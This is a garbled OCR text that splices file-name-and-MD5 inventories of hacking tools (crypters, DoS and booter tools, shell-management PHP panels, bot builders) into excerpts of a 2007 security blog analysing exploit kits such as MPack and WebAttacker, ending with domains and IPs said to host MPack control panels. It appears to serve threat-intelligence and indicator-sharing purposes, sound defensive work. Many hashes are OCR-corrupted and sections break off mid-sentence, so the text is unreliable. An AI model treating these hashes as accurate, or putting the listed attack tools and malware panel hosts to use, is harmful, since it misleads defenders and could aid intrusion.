f7ed089e7753622c862e89bde00d28ea 
jquery.ui.timepicker.css 
db17f3329c3ca9acdff851c80b816801 
jquery.ui.timepicker.min.js 
b1f7d0e371069b443814d01bed7e0fb3 
jquery.validate.js 
078f73355ce617bbc3e2404a0b422f4d 
header-bg.png 
edbc087b78c8a0bf88147e55749c4097 
Installation Guide.txt 
222133ce6c95e5107994e38fcO06alc5 
.DS Store 
53c890e812a02f51d6b91506bef3c881 
. ..DS Store 
5ecad39c470178e1b0ef93e534b60fda 
. _activate.php 
4e7c1b33a49835bf8d2688432212854d 
. _admin.php 
4e7c1b33a49835bf8d2688432212854d 
. _check.php 
9abf98699c82d877b1a5352dc9a2a885 
. _checkuser.php 
4e7c1b33a49835bf8d2688432212854d 
. _dbc.php 
9abf98699c82d877b1a5352dc9a2a885 
. .do.php 
4e7¢c1b33a49835bf8d2688432212854d 
. _footer.php 
9abf98699c82d877b1a5352dc9a2a885 
. .games.php 
9abf98699c82d877b1a5352dc9a2a885 
. _header.php 
9abf98699c82d877b1a5352dc9a2a885 
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3.9.7. Popular Web Malware Exploitation Techniques (2007-09-10 14:30) 


August 2007 vs. July 2007 


ANI 
Link to known exploit site 
VMF 
iFramers Launcher Script 
Search Engine Hijack 
B August 
406 Rollup Package 

B July 
IE COM Create Object 
Web Attacker 2.0 
Others 
Modified MDAC 


Trojan Fake Codec 


0% 5% 10% 15% 20% 25% 30% 35% 


Percentage of Overall Occurrences 


Who needs zero day vulnerabilities to achieve a widescale malware infection these days? Ob- 
viously the lack of this popular in the past prerequisite for a successful client side vulnerability 
exploitation, is no longer needed, but how come? Rather simple and that’s the disturbing part 
- malicious parties stopped falling victims into the common perception that the end user is 
so fully patched, that zero day vulnerabilities are needed to break thought his thought to be 
complex use of security measures, instead, whether an event-study or plain simple common 
sense on their part, they’ve realized that an unpatched and obfuscated vulnerability is just as 
dangerous as a zero day, and the results have been evident ever since. 


Going through [1]the screenshots of the [2]linfected population of a certain [3]malware 
kit, you [4]can clearly see the diversity of the outdated vulnerabilities used. Multi-browser 
vulnerabilities [5]IFRAME-ed all-in-one to achive the highest possible efficiency rate as there’s 
a slight chance a visitor will return to a site they’ve managed to embedd the malware at, 
twice. The success of the these kits therefore has nothing to do with malicious innovations, 
but rather [6]a successful tactical warfare against reactive security response. If perimeter 
defense cannot be breached, it will get either ignored or bypassed, precisely why client side 
vulnerabilities are back in the game with full speed. 


Evidence showcasing this KISS (Keep it Simple Stupid) principle : 

- IcePack, MPack, WebAttacker, the Nuclear Malware Kit, and pretty much every popular 
malware kit is taking advantage of outdated vulnerabilities, whether obfuscated or not 
depends on the pack’s version and the malicious party’s understanding of the concept 

- [7]The Massive Embedded Web Attack in Italy was using MPack’s outdated arsenal of 


obfuscated vulnerabilities and despite that it achieved its objectives and infected thousands 
of hosts 
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. _—hub.php 
9abf98699c82d877b1a5352dc9a2a885 
. _images 
4e7c1b33a49835bf8d2688432212854d 
. _includes 
4e7¢1b33a49835bf8d2688432212854d 
. javascript 
4e7¢1b33a49835bf8d2688432212854d 
. _login.php 
9abf98699c82d877b1a5352dc9a2a885 
. _logs.php 
4e7c1b33a49835bf8d2688432212854d 
. _manageshells.php 
4e7¢1b33a49835bf8d2688432212854d 
. _mysettings.php 
4e7c1b33a49835bf8d2688432212854d 
. _online.php 
9abf98699c82d877b1a5352dc9a2a885 
. _purchase.php 
9abf98699c82d877b1a5352dc9a2a885 
. _register.php 
9abf98699c82d877b1a5352dc9a2a885 
. _thankyou.php 
9abf98699c82d877b1a5352dc9a2a885 
activate.php 
29e8a708c05a3b3a94162bbde986f15c 
addshell.php 
c4f01lcOef02c489a4ead88ccf3e65e77 
admin.php 
749795e582b37d30f18f28736b7f9d20 
check.php 
6947f85a6c046338f079224a984b7f29 
checkuser.php 
0491e6a35e63fc7da7b7d863e1f32f5d 
dbc.php 
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f3b856ec637d22451b79156a3b9b8644 


do.php 
1b2000290158151cda00caac858e4a6b 
footer.php 
bd5fe31b820eb12b0c3abbb108eb1f71 
games.php 
0f7192dc1283118f84cf2f926a7908a3 
header.php 
cb8f9e5b559cf9e67924eb4331ed926e 
hub.php 
2f373f027c2a0b20f55e93444cbe0d7d 
index.php 
7733c1d5f5e64aff360cada59a025b11 
login.php 
ea919bc47da08b3042f47b879bb4dcc9 
logout.php 


£7f43702441b28154fb45ble2cddf99c 
logs.php 6846d0abab643c3779af3b1a27611bal 
manageshells.php 
£7¢4352a24fb121465160837a9276df1 
mysettings.php 
d94d6a0c4ad173956adea2c13554e732 
online.php 
71f72f7d4af6210f9d564e6b73fcc58e 
purchase.php 
1d6251c24a90f0a0610990e15e446465 
register.php 
1d87d26584e1052a3bb2ac851d128b72 
shells.php 
535720c0cd383622df8ba2b0dd293bb0 
thankyou.php 
dca243783eael1a5a92bd653c35874072 
updates.php 
f30db917bc87641fea9900bda4ccb4a8 
.DS Store 
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aecf870c1f54a0ac056113c55873c296 
. .DS Store 
5ecad39c470178el1b0ef93e534b60fda 
. _account.png 
4e7c1b33a49835bf8d2688432212854d 
. _add.png 
4e7c1b33a49835bf8d2688432212854d 
. _admin.png 
4e7¢c1b33a49835bf8d2688432212854d 
. _attack.png 
4e7c1b33a49835bf8d2688432212854d 
. _background.jpg 
4e7c1b33a49835bf8d2688432212854d 
. _bg.gif 
4e7c1b33a49835bf8d2688432212854d 
. box.gif 
4e7¢c1b33a49835bf8d2688432212854d 
. _cancel.png 
4e7c1b33a49835bf8d2688432212854d 
. delete.png 
4e7c1b33a49835bf8d2688432212854d 
. -home.gif 
4e7¢c1b33a49835bf8d2688432212854d 
. _hub.png 
4e7c1b33a49835bf8d2688432212854d 
. _info.gif 
4e7c1b33a49835bf8d2688432212854d 
. _info.png 
4e7c1b33a49835bf8d2688432212854d 
. _logo.png 
9d438fb315176e24c5e5d3f1c3d468a0 
. _navigation.gif 
4e7c1b33a49835bf8d2688432212854d 
. _news.gif 
4e7¢c1b33a49835bf8d2688432212854d 
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. _Sstyles.css 
4e7c1b33a49835bf8d2688432212854d 

. _visit.png 
4e7c1b33a49835bf8d2688432212854d 
account.png 
f06ed29a1f595ca0f6c55050d9286c76 
add.png 
10a937c911080e41b7cb9a9de9ba44ac 
admin.png 
f90a24ef0c062Ff7d99195303d3eac446 
attack.png 
5965277bf3794e776d63720dfd6efb34 
background.jpg 
20ae8d57237de989c2e4102122c2253a 

bg. gif 

4986640d1caf7e8b8574c541711a9aea 
box.gif 

5b37c7dde228dac26cdce2ce9eccedad 
cancel.png 
6bf9ba341234639d4550602fd35e0988 
delete.png 
6bf9ba341234639d4550602fd35e0988 
home.gif d2c93d8510e7fc07 7f9ef7 765ff20a89 
hub.png 
fdeaf68ba6e3b0ba507a55ee85143307 

info.gif 8f3e812905f59a0e70755650a8a9b271 
info.png Obad85f30b97b1d1011c8161c66443f4 
logo.png 61323cbfa9f58813f61fal3e7b6ba8b7 
navigation.gif 
fd2b948223c1bc2e3b1885eb5d49b0a4 
news.gif 8b0a1312d184260ea42506f66298da5d 
styles.css 
8b5bff75al0ff63a8c39638985a284el1 
Thumbs.db 


2e0c655693f8a567782560d8218dd899 
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visit. png 
8a84a5d52aaa4b242af481969b9c774a 
.DS Store 
cb39fb6fdbd37ee7655054793396ba7b 
. .DS Store 
5ecad39c470178el1b0ef93e534b60fda 
. _EpiCurl.php 
4e7¢c1b33a49835bf8d2688432212854d 
. ezSQL.php 
9abf98699c82d877b1a5352dc9a2a885 
. _ezSQLCore.php 
4e7c1b33a49835bf8d2688432212854d 
. _functions.php 
9abf98699c82d877b1a5352dc9a2a885 
EpiCurl.php 
87519746acfd86a4eee60b297cf29929 
ezSQL.php 
6d3cd43c6cea66e435de36a46d559ad4 
ezSQLCore.php 
b20797087c5159c1d37fc51446033ce9 
functions.php 
6dc41dd8720eb670197d80cab9da2869 
. _count.js 
4e7¢c1b33a49835bf8d2688432212854d 
. jJquery-1.3.2.min.js 
4e7c1b33a49835bf8d2688432212854d 
. jJquery-1.4.4.min.js 
4e7¢c1b33a49835bf8d2688432212854d 
. Jquery.validate.js 
4e7¢c1b33a49835bf8d2688432212854d 


count.js e3ad6cf280lafc8bb78ba0d0ca721c37 


jquery-1.3.2.min.js 
bb381e2d19d8eace86b34d20759491a5 
jquery-1.4.4.min.js 
73a9c334c5ca71d70d092b42064f6476 
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jquery.validate.js 
d4afd58bbf0c43f0998264f92ae1d212 
0 Crypter .exe 
42e48811fac44aa61d558b11f5f5c507 
2012 Crypter.exe 
9b160f64ce82250a60c37ac850edac66 
Chrome Crypter 4.9.exe 
a97ca343b7c34d694f52b3be60b165fb 
Grieve Crypter 2012.exe 
fc6bceff2387ca871lac6b7dc6f7f8ebd 
High Life Crypter.exe 
cfb30f9edd5db91983e7d2961899f474 
iBinder.exe 
deb9249b0fcc0d55813e4af7a87b2dcl1 
Infinity Crypter v2.exe 
437986e8e17940013f1f05bdafb2782d 
MoonCrypter.exe 
0ec3da715b4dd0c38c00d5102dbcc6c6 
no $crypter.exe 
5d051c389e7082d38e95081f8852e4bd 
Psomasweb Public Rinajel Crypter.exe 
10093b7a2cc08e52d866acdcb162abef 
Saddam Crypter.exe 
7688c4cab5481b5127ae30bc5522735c 
ZMini.exe 
efaee196e003b99abf8930cbab6ccOf3 
ByteCrypter v3 cracked by blackpearl[deceptiveengineering.info].ex e 
3fbc28ae5d9dba28784e9f66833959e2 
Read me.doc 
€232257af831f35f4fdelc4552c490aa 

2 on 9 (22 %).txt 

Cryptech _Public.exe 
f5a7c2842c839dd8adb56d5a42875d5f 
confkey.snk 
afd99f650b745388bff4906f6c359d5f 
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Cryptex Advanced-V3.0.5 - Cracked by RON1N.exe 
d466d130d5913adff4c069b9f2ad96a9 
Mono.Cecil.dll 
d750c6e40c0c70bedc223d5dda891163 
DecOder _11-9-2012.exe 
fbo38c6d651b32273a6ae0ccbfc9c605e 
Entropy _v5u2.exe 
8fed8348e1a69c019d82464d7 4f0d8fe 
ConBind.xex 
80419a1a1538584b5f8c0ea44d80e96c 
EXE2VBS.exe 
b567cbfeel4ca8a78d90c5438fb1fa07 
pack.exe 2777259fa69b4adb096a65cf44cla/63 
Rand.dat 32f29d1b04be3732cbd1dbc6af58f7a0 
ResHacker.exe 
2f92eed4e2061af0961f379e9ded70d6 
ResHacker.ini 
19869c4a0bd52a9dedb52abe4f3dae61 
ResHacker.log 
d58813ea547788cea381852e9d16a42c 
ShellBind.xex 
3c51dd449f3e0d659deace46cac740c5 
Stage1Config.con 
2004854cd772cf8f72dc2dad50eef3ef 
upx.exe 
8d6bc02ce011bec74aac7e561766ef6e 
Hidden Sight Crypter.rar 
91a607d2c2466e137c082030e887c266 
Hidden Sight.exe 
d57c0b186f317542fe21e13b415afd0e 
Disclaimer.ini 
dclcc4fbd94fdb8e8be6be87a85cc123 
how to use.txt 
38cf1371b15b76ec4c240ceb9c4f8e14 
LiOn Polymorphic Crypter.exe 
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22400e4f58958bcbbdc53d8cfabdf089 
Build.bat 
1b872909063641884989ff9dfbad92bb 
DCC32.EXE 
4534b25b457a21c06a7f44528b45f0dc 
functions.pas 
c7047a644a3e12f168da5157ce673611 
rlink32.dll 
794f20bb9bd2cf29869e716d103eb489 
SysInit.dcu 
22bd95b4200201ef812e794279597918 
System.dcu 
480e9785a655f74dfbb7ae54719ef9b1 
Types.dcu 
9a870060c4beleee6f8b7e4258c06609 
Windows.dcu 
ddf451ea3488f9ef905466442d3833ca 
lolo.exe 5f7900183181ce5fddb2fc1b433dc3bc 
OwnZ Crypter Cracked.exe 
912d0dbf45dddf56894bal193ae36e51f 
READ ME.txt 
030e9feaaf50b5f81443ab5ae9f7844c 
borlo = Normal Stub.txt 

changelog.txt 
7£22715f9d869c906a32f02e1510f7ef 
How to register a serial number for Own’Z Crypter.pdf 
93da0f8f7 72fd6388e58371e36c87792 
lolo = Binder Stub.txt 

Native Images.txt 
e6ac62a2ac6531207efb57aa2833681e 
New _license _sytem.txt 
b897f0a89alcca27b66bf7412a6a2bf5 
Normal 99 % _finish.txt 
161f45191e4fcdc311594676c7cc92a0 
aaa.exe 
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38f3921323d04aec568cal5cc68b025e 
AAB.exe 
379ee4296ec5fffdd741366ebcd2bfde 
ABB.exe 
f98d75e1b7d9cf872520d6dd448553c9 
ABC.exe 
3d0b796b737a8978c566235033d29654 
ACC.exe 
1b423b8d777eafc719d987ed26f0d2d0 
How To Use.txt 
1d952fad664c0d14fd454166af7 68ff1 
Refract’s Crypter.exe 
23c6fa4e6b94422381302678a73d5785 


Stub.exe 956b2512fcea8d0589eac5479c79105fc 


CecilObfuscate.dll 
3ce095424648ccecf86b187866934bdb 


sikandar 8.1.0.0 cracked by blackpearl.exe 


071c49fd6606e0714281f06f54c23723 
Update Extension.dll 
ec2879c17e89d55c6b9dc627029a476a 


stub.exe 34fe594b5a24432b9c364e036f7e19bc 


UC.exe 
308c0a68d69fc65c5832086d3ab434d9 
-SpitFire _DoS Tool.exe 
34dd8796d6c1dd4bf6b6937853a7103b 
Anonymous DoSer.exe 
270f2f56af0de91cc5f0b83ed241851b 
assault.exe 
97b7c87dd6d2ef4654648d6e221d509a 
Attacks+Booter.exe 
8e9bc0c564cd50b267f8b1b4ad6c1f47 
B2 DoS - By [U/Stealth.exe 
b95f6c4d0335e0f9fa3fc71cbf5640a7 
BattlePong.exe 
359b81b7405078e7ced0b96ef8749424 
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bdOrk’s DoS Killer.exe 
fd2215b4c9ce36e1fb0b9202398dd1b3 
BFF DoS (Ping) v1.0.exe 
2584fdc930667c942b2cd0319d685107 
bi0S DoS.exe 
04718ba51c0201a305d14ed5a7039fcd 
BuffMods DDos V2.exe 
aaee9fbf9a5c3d5fdd058c9bO0fe7 7fed 
BuffMods DDos.exe 
31b2cc201c59689efc1falc645e6d976 
click _v2.2.exe 
dbe36a7450882cc0a1d04bd1b337dacc 
CrazyPing v1.1.exe 
e2f1a9570901b2d43a08a596d9511810 
Dark-DDoSeR-v5.1-Cracked.exe 
af7506aaccfcd24df83fb11df001b79c 
DarkMagic Flooder.exe 
20d6555cdf90e6b702bd91f14cbda093 
ddoser.exe 
c837afefdc8ffdb8590f68813b750241 
DecFlooder v1.00.exe 
af76954129949465d5fd1680b1812372 
DOS.EXE 
71f739de0ec8cd5b645cbdd5540b0d7d 
Exploit Attacker v1.1.exe 
3222f726b752bea68ab4a0c55eaa5ffd 
F-edUP.exe 
8f30ca5aaa5454256f8c1f123472c717 
firewallkiller.exe 
c83c605ae710c3b4e05fc196e1421217 
Flooder.exe 
b1715c48b6466b22b290fc08f71889d2 
FloristBooter 3.3.exe 
b5bf91e13da0cff70felb2501b54128e 
Herbalists UDP Flooder v2.exe 
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- The recent [8]Bank of India breach was using a modified version of the popular mal- 
ware kits mentioned above, in between syndicating the hack with another campaign using a 
multi-IFRAME-ing techniques, again taking advantage of outdated vulnerabilities 


- [9]Storm Worm’s success is [10]mostly due to the fact that the end user is still living 
in the "malicious attachment" world, and so outdated vulnerabilities are again successfully 
used again her 


Exploit Prevention Labs’s recent stats on [11]common vulnerabilities used as an_ infec- 
tion vector can come very handy in terms of demonstrating the mass use of these malware 
kits. The bottom line is that their modularity combined with features and add-ons for them 
available either though a purchase or on demand, is an emerging trend by itself, one whether 
you cannot tell is it a script kiddie or sophisticated malicious party you’re dealing with. And 
even if it’s the second, [12]the KISS principle has its own ugly applicability in the malware 
world. 


http: //ddanchev. blogspot .com/2007/08/nuclear-malware-kit.htm 
ttp://ddanchev. blogspot .com/2006/11/nuclear-grabber-toolkit .htm 


ttp://ddanchev. blogspot .com/2007/07/icepack-malware-kit-in-action.htm 


1. 
2. 
3. 
4 
5 

6. 
7. 
8. 
9. 


http: //ddanchev. blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 


10, 
11. 
12) 


3.9.8 Google Hacking for MPacks, Zunkers and WebAttackers (2007-09-10 15:49) 


Authorization Required 


Username 
Password;| OK| 


If wannabe botnet masters really wanted to hide their activities online, they would have 
blocked Google’s crawlers from indexing their default malware kit installations, and changed 
the default installation settings to random directory and filename, wouldn’t they? Apparently, 
a default deny:all rule for anyone but the botnet masters doesn’t exist as a principle among 
botnet amateurs, which leaves us with lots of malware campaigns to assess and shut down. 


The following are IPS and domain names currently or historically used to host [1]MPack, 
[2]WebAttacker and [3]Zunker control panels, as well as live exploit URLs within the packs. 
Some are down, others are still accessible, the rest are publicly cached. If index.php doesn’t 


1052 


23d45c9c4a6dd039aee096188d967960 
Hnuke223.exe 
87a42fc033fa736d7652c26139969908 
HOUC.exe a075b2afb67c50adef47f47b1fc2bea7 
IgmpNukeV1 _0.exe 
35d01f7dbbbb3406153e48161b8c5299 
Inferno Nuker.exe 
84b7b9148156ff4cbO0df2d21bc514222 
KiLLmME.exe 
b0bed82e51cd9933159dd17ccdad4c8d 
KRATE.exe 
5c4a7b8a7e0fb2e887faa569895e85 7f 
mnuke25.exe 
607bdf63b9b43661f0c9d86bbd5ad1f9 
Muerte.exe 
cbf290e15c3c828391c2c542aa5c2615 
Nemesy.exe 
439de73c0f16f013718056bf55edabee 
NuclearDDosser.exe 
0b65882314b4d7fe3316c27035e05a3c 
panther2.exe 
3eal21ae034e6a36e5e297e4aa01fd49 
PingFlooder.exe 
88b7451ff107ff14f8df20486519f932 
port cheker.exe 
3b33d345ed98397b57a60f10b0bb4634 
RocketV1 _0.exe 
226f550df3f65fb44a694bfe54929a94 
Shockwave Booter v2.0.exe 
1¢c72942961917ccf4fc5bele823ab4cb 
sin.exe 
dce29820acd1ac918d72911a0ec10dc7 
Soccers Booter 1.exe 
b15b0e737d9b812f3eac195ae52b2316 
Try2DDoS _Builder.exe 
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74d8bbf5e0eb043c92834ec2a276a265 
UDP Flood Pack v1.exe 
374bd5857faed76b4f2d52b3a0e31b6c 
UDP Flood Pack v1.pdb 
ad336f17776904424e1a6b907222f1fc 
UDP Flood Pack v1.xml 
€253b2f2259dd9f8dddfcc686b34df89 
udp flood.exe 
00b7cca92a931ed1147f58694fd51fb5 
UDP Flooder By FKN.exe 
6e1e88b43b1dc54f36aa4fd2a4167e2b 
UDP Flooder.exe 
30cae260837144b02144cb6b666bf552 
UDP Flooder.pdb 
eebf46f0383637a8ad71b4c5b8d12954 
UDP Flooder.xml 
OfOb7ec83298df88fffd396dd7dcb4a2 
Unknown DoSer release.exe 
4f3782e2f6f8daeeb7cf7957d60b8044 
WicKds Booter v3.1.exe 
914bb10e7e05eb5c0d152baa67020fd8 
xDDoSeR.exe 
298beee7e3526cee6893a9c0af9b44f1 
Auto Clicker.exe 
bafef91d4721ac3a0b1d7d2b7d104652 
Auto Clicker.pdb 
2a94586c75cf2cb00229980a7308e42e 
Auto Clicker.xml 
8b97e542dd0d446e5cbd2ec946fd4b5b 
Eternals Auto Typer.exe 
d6003407c218079ffae71982e69236af 
Eternals Auto Typer.pdb 
a7d1cb2cab7ac9fa57c087f1145fb076 
Eternals Auto Typer.xml 
31ee62912a427e08641b91387e5c8661 
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Eternals Extension Spoofer.exe 
f7676637914ed508b751a0e27495906a 
Eternals Extension Spoofer.pdb 
15207d00f7d5a56704680534f4e92d8e 
Eternals Extension Spoofer.xml 
343e4f0f71c9dfa8f83589d005b4e929 
Eternals Site IP Grabber.exe 
bc0415abcb1e61fc5c51204ac2f20e4d 
Eternals Site IP Grabber.pdb 
4f775f3427cca83a580bf7774315a4fa 
Eternals Site IP Grabber.xml 
8f3350ecd9ab6f41ab69fa95d8f049cd3F 
Eternals WebBrowser.exe 
270cc2af2a427709e3dc6600ab571cd6 
Eternals WebBrowser.pdb 
9514b966143968c33c3193aa225f749F 
Eternals WebBrowser.xml 
5fb35c019e4c434b4c0af716d1ledf09d 
UDP Flood Pack vl.exe 
374bd5857faed76b4f2d52b3a0e31b6c 
UDP Flood Pack v1.pdb 
ad336f17776904424e1a6b907222f1fc 
UDP Flood Pack v1.xml 
e€253b2f2259dd9f8dddfcc686b34df89 
UDP Flooder.exe 
30cae260837144b02144cb6b666bf552 
UDP Flooder.pdb 
eebf46f0383637a8ad71b4c5b8d12954 
UDP Flooder.xml 
Of0b7ec83298df88fffd396dd7dcb4a2 
Anonymous High Orbit lon Cannon.exe 
bff3f5b6a77ad6077f8bb450db4d0aal 
Ataque Hola de Libertad.hoic 
8545406e9887fff9b7d23bd8d1ba827a 


Bombas de Energia.hoic 
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bc3480db06614b5e56376559d4138c8e 
Paquete de Impulso Aumentado.hoic 
117dcd32592d6785a55c9ceac79bd557 
Paquete de Impulso.hoic 
4715a3d5e2323168c4afeb3637fc127b 
Appearance Pak.dll 
d3f07fa59e8eff7fb7e1ac9355a73c75 
Internet Encodings.dll 
2f51e9b688deb640db24cabeccc4231el 
RBScript.dll 
b0901956a3e2b819e42f6779a56c2025 
DarkMagic Flooder.exe 
20d6555cdf90e6b702bd91f14cbda093 
settings. ini 
99a01f761a674644d3a094747d574130 
DDos V2.0 By Mike12.exe 
be5c0f830aaa8e602ea0a78ce70f6428 
Lggi qui se hai problemi.txt 
21e401b76332cb3b19add9443c27b171 
mswinsck.ocx 
3d8fd62d17a44221e07d5c535950449b 
DdoS v2.0.0 Universal.exe 
612858c232d0885fe2127c6b4ec91lae4 
ddvniek’s Hacker Toolbox 1.2.exe 
eee822bbf3249d38dfe405e8e216ec54 
DoS.Exe 
1189348af2bfa469857f42b841046ba5 
dsSock32.0cx 
e3c030248e3fb0510aedac9ab3988918 
readme.txt 
778166e3e291e83002c5aal42a7936bb 
VB40032.DLL 
17db6a514b5fdc737dd44ba49ad6d76e 
WILTERED.NFO 
761492eb8108a63c3041462706f28e33 
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DeStROY DoS Tool Beta.exe 
0d2eb7525c5098d18cbf09950faf983f 
flooder.exe 
f6253ed4c8f47d037bd96ef94cb83c27 
Mswinsck.ocx 
3d8fd62d17a44221e07d5c535950449b 
proxies.txt 
64b89480f6b86d16d10a68e5455f8b56 
CONFIG.dat 
4de42d0f6b065f051fb5ff2fe530276a 
DoSHTTP.exe 
58bbf84f9aa7e8fe61787ab68df83blel 
INSTALL.LOG 
45b13fd368eaa2ccc26c78210902ec97 
LicenseAgreement. rtf 
f59200d3b3b7c09bfd379e367aaf652f 
LicenseAgreement.txt 
d1le88fba57f32fc7481db2302cfl3a3d 
UA.cfg 
dc2bddf146d0ca8141558618e985bf51 
UNWISE.EXE 
f376fb2de569db2045b11771c9e06844 
UserGuide. rtf 
dec3fa4e5a7bc588681a2b353059e046 
UserGuide.txt 
83112d25d310c3ffeb55cf207fb3093a 
AxiInterop.MSWinsockLib.dll 
54efbc05d29b0f107741ed643dcb5c68 
Dragon Attack vl.exe 
b5373497d26629bbe389f871c9c3d568 
Interop.MSWinsockLib.dll 
343ec1e971305f4b45e8cb168cb2caac 
DrBlowFish’s DoS.exe 
bdea8e7el5beba903e86a2fbc368f207 
CreateBot.bat 
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61c6caf77f53273e7186e3454f2cf358 
HC - Client 2.6.exe 
c2bc0208f25c924216852e60a3886969 
Info.ini 53a9e98e33f1d88660ba62a2cd7818fe 
ReadMeg ....txt 
365d932931724102c06b2afa308513ac 
Bot NotEdited.exe 
83622b1d47052fb507d818f003299e76 
server.exe 
821218041a17821565f423444f4d87b5 
Codejock.Controls.v13.4.0.Demo.ocx 
bab9a2a9eae830ed495cbbfefifb7 7f9 
CODEJO 1.oca 
940e225116684f37fb387fc33fdb7d05 
comctl32.0cx 
eb5f811c1f78005b3c147599a0cccf51 
COMDLG32.0CX 
d76f0eab36f83a31d411laeaf70da7396 
MSCOMCTL.OCX 
ecc7d7f0d3446de36045d1d9e964fafe 
MSWINSCK.OCX 
3d8fd62d17a44221e07d5c535950449b 
Registrator.exe 
a7b54a432be12d0f4b6d7238a31008fd 
CreateBot.bat 
61c6caf77f53273e7186e3454f2cf358 
Info.ini b3a4673af42dd7d47aba817b4466c7e2 
ReadMeg ....txt 
365d932931724102c06b2afa308513ac 
Codejock.Controls.v13.4.0.Demo.ocx 
bab9a2a9eae830ed495cbbfefifb7 7f9 
CODEJO 1.oca 
940e225116684f37fb387fc33fdb7d05 
comctl32.0cx 
eb5f811c1f78005b3c147599a0cccf51 
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COMDLG32.0CX 
d76f0eab36f83a31d41laeaf70da7396 
MSCOMCTL.OCX 
ecc7d7f0d3446de36045d1d9e964fafe 
MSWINSCK.OCX 
3d8fd62d17a44221e07d5c535950449b 
Registrator.exe 
cf1ca302813399e9acec14e6318fe8dc 
Hack.exe 66064dbdb70a5eb15ebf3bf6é5aba254b 
Icon _1.ico 
8c4f592491dcc9c7a2d04cbb35f1f3b0 
RemoveBot.bat 
0381b30e53b41fc5b9f14b77b4996e18 
upx.exe 
c92544fc96e214eb24687315167d1f0a 
Hack.exe 66064dbdb70a5eb15ebf3bf65aba254b 
Icon _1.ico 
8c4f592491dcc9c7a2d04cbb35f1f3b0 
RemoveBot.bat 
0381b30e53b41fc5b9f14b77b4996e18 
upx.exe 
bf67439e621e65b229b5da7de627a587 


HostBooter v5.5 Fixed Crack by The Old Warrior.exe 


ee03e1d3a86d2d33847593216460dcf6 
Server.exe 
004a44e8e811978e63c8c15f4385352d 
atk.pyd 
fca75c83a30f77f2c9ee26d48d7cllle 
bz2.pyd 
044ecbcal1103ee5f2e1e936195c547cd 
cairo. cairo.pyd 
d953a04606cf92fbdbfdfd344935338d 
DNSAPI.DLL 
f7683ec1225435144f28b611546ba5f2 
gio. gio.pyd 
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0eb5009486bd5ba2df57ba60c1298f86 
glib. _glib.pyd 
b9de97fea58cbf68alca0c42e8456541 
gobject. _gobject.pyd 
c67a225b49b1ab160082dacledd2903e 
gtk. gtk.pyd 
b22fa5bda095ba3f610f177e2e85c3f1 
gui.exe 
ac258898b1930e358e194b191335758b 
http dos _cli.exe 
329909142d5ecda70ba429869e42b3ab 
iconv.dll 
dc02cf8201501bal5cb776c7a2f8ceb7 
interface.glade 
09925e0c52ea122cb749cca83ec27bbe 
intl.dll 9f95ece3d2b3909de4d9147c4d93f976 
libatk-1.0-0.dll 
1f61d69eb4757ff19ca081269c9dc9dd 
libcairo-2.dll 
4c4392b1d548bcd3974a8cbe8686b361 
libexpat-1.dll 
a8f145a27dc339f75916cd81c8760052 
libfontconfig-1.dll 
690ebbf1lfa1lb4505ffff7389b0930ec4 
libfreetype-6.dll 
1b294b7f7a21ea1b04b726528415deaa 
libgdk-win32-2.0-0.dll 
6edbac61ac767705dcal5a65b29ea8fa 
libgdk _pixbuf-2.0-0.dll 
390aa0876b094a858cb960045c98c490 
libgio-2.0-0.dll 
58177dc07e840cc57ca451860288edf7 
libglib-2.0-0.dll 
cef849d6d7476df74a3554ecc59b858e 
libgmodule-2.0-0.dll 
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7079eb02f68016e43e0bd6a19ea1429c 
libgobject-2.0-0.dll 
efb9e0e71089fb7001bde8119cbce510 
libgthread-2.0-0.dll 
c9a921a88693ddd5d163d657224d1a01 
libgtk-win32-2.0-0.dll 
86df9814517377e916d255835803d05e 
libpango-1.0-0.dll 
8041c25e8ef512dbc466a086F7 223886 
libpangocairo-1.0-0.dll 
a906029b3617c07275d3662b508f3b23 
libpangoft2-1.0-0.dll 
c08a50a9b6cal441863cbd29098eeb69 
libpbangowin32-1.0-0.dll 
66901644904e59188c53ebfb14288635 
libpixman-1-0.dll 
75cb50d81424ed9a4a0f925377f574f5 
libpng14-14.dll 
d24214e74cb6eaaddb94dd29b3e0859d 
library.zip 
8137bb8593460a920b22109eab36ef5e 
license.txt 
d32239bcb673463ab874e80d47fae504 
MSIMG32.DLL 
2ec53b5a351c4d443896dbad117f7e82 
pango.pyd 
5c7a96948df9b25957bddc857b34d553 
pangocairo.pyd 
7e0f654c8d4408cl1d3ffffd2c7b2d91d 
pthreadGC2.dll 
48147f86ed7dd434ccc6f60ff87de686 
python26.dll 
b86a96a4d3fb1fd71cd1b5aal161c0ea8 
pywintypes26.dll 
abc5dcac962ae8aft7af214dd0d6d4ff6 
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select.pyd 
035f7619b1f356a62461ca83140847f6 
unicodedata.pyd 
633105082ad9f315c2ac60e9fbdec277 

VERSION 

a3ab4abe7b3546d22fece087cdbee911 
w9xpopen.exe 
ad67468fe29a5a517b6d6f589f08490e 
win32process.pyd 
5bf6ba38b703df5bbe18358a3188c929 

z.dll 

e515c1ba489a3ab0f9a641435799c389 
atk10.mo c5290f93ae865a88509286b56c185c43 
glade3.mo 
bc2277d02eb4e4337af0d9eflebea4c2 
glib20.mo 
dc771ba4f2d33b7a04958b527f53a29f 
gtk20-properties.mo 
5a96a91865b8dadad170e870a61758d8 
gtk20.mo ecO08ff40e427ed043ea96e2584083adc 
atk10.mo 2cf8f3395e0397070423c804ec533e6c 
glade3.mo 
dc45a01c5fcdc02041888fc7d8024739 
glib20.mo 

744209ea7f8ac8497fc71ccab4acaca5 
gtk20-properties.mo 
2b786709876ff96e2d6f7dbOfé6ffc7e0 

gtk20.mo 44d97529a9b1fc4b794d75899ad20a2c 
gtkrc 

94d104680cec5f3d8bbec56258d0c926 
iDisconnect.exe 
2f8dc202076b12bca59b9061ef295e42 

Infamous Stresser 2.0.exe 
25190d3916c71683df1a96760984244f 
DevComponents.DotNetBar2.dll 
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exist, admin.php or zu.php act as the default admin panel. 
MPack Malware Campaigns : 


wmigra.org/mpack/index.php 
64.62.137.149/ edit/ 
81.95.145.240/logo/ 
81.95.150.42/MPack091cbt/index.php 
brbody.info/mpack/index.php 
innaidina.info/mpack/index.php 
rallyesimages.ch/liens/test/ 
sol.h18.ru/mpack/index.php 
81.95.145.240/logo/ 
icqmir.iplot.ru/mpack/index.php 
cordon.ru/mp/ 
havephun.org/mpack/index.php 
xbr.ru/images/old/mpack/index.php 
evil-x.org/spk2/ 
tyt-menia.net/mpack/index.php 
rufat.info/mpack/index.php 
iwiw-hosting.com/upload/ 
stepbystepbg.org/img/ 
mydulichusa.com/mpack/index.php 
csextra.wz.cz/weapons/mpack/index.php 
